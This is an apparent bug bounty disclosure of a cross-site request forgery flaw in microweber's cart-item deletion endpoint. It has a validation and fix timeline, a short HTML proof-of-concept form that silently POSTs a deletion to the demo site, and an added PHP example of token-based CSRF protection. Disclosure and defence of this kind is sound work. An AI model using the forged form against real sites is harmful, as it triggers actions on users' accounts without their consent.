Cross-Site Request Forgery (CSRF) in microweber/microweber

Valid

Reported on

Oct 26th 2021


Description

There is a CSRF on Delete Cart Item on the user side.

I get the error message "Item not removed from cart", but the item will already be deleted (the message isn't correct and the delete action will be done).

Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/api/remove_cart_item" method="POST">
      <input type="hidden" name="id" value="125" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

After you click the submit button, the item with id 125 will be deleted from the cart.

We have contacted a member of the microweber team and are waiting to hear back a year ago
Peter Ivanov validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov marked this as fixed in 1.2.11 with commit 2fa9a6 a year ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
api_callbacks.php#L126 has been validated
shop.js#L115-L133 has been validated
ShopManager.php#L101-L105 has been validated
shop.php#L104-L115 has been validated
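
The following is an added example, not code from the report or from microweber, and it does not reproduce the fix commit. It shows a session-bound token check under which the cross-site form from the PoC is rejected before the cart is touched, and a response that matches what actually happened. The function names, the `_token` field and the session layout are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers for illustration; not microweber's actual code or fix.

/** Create (once per session) and return the token the site embeds in its own forms. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** True only if the request is a POST carrying the token stored in the session. */
function csrf_request_is_valid(string $method, array $post, array $session): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['_token'] ?? '';
    return $method === 'POST'
        && is_string($supplied)
        && $expected !== ''
        && hash_equals($expected, $supplied); // constant-time comparison
}

/** Hypothetical remove_cart_item handler: verify first, change state second. */
function remove_cart_item(string $method, array $post, array &$session): array
{
    if (!csrf_request_is_valid($method, $post, $session)) {
        return ['status' => 403, 'error' => 'CSRF token missing or invalid'];
    }
    $id = (int) ($post['id'] ?? 0);
    if (!isset($session['cart'][$id])) {
        return ['status' => 404, 'error' => 'Item not in cart'];
    }
    unset($session['cart'][$id]);
    return ['status' => 200, 'success' => 'Item removed from cart'];
}

// Constructed demo data: a session whose cart holds item 125.
$session = ['cart' => [125 => ['qty' => 1]]];
$token = csrf_token($session);

// A cross-site form like the PoC sends only "id": rejected, item still in cart.
$forged = remove_cart_item('POST', ['id' => '125'], $session);
// The site's own form also sends the token: accepted, item removed.
$genuine = remove_cart_item('POST', ['id' => '125', '_token' => $token], $session);

echo json_encode(['forged' => $forged, 'genuine' => $genuine], JSON_PRETTY_PRINT), PHP_EOL;
```

Setting the session cookie's `SameSite` attribute to `Lax` or `Strict` is a complementary control, since the browser then omits the cookie from cross-site form POSTs.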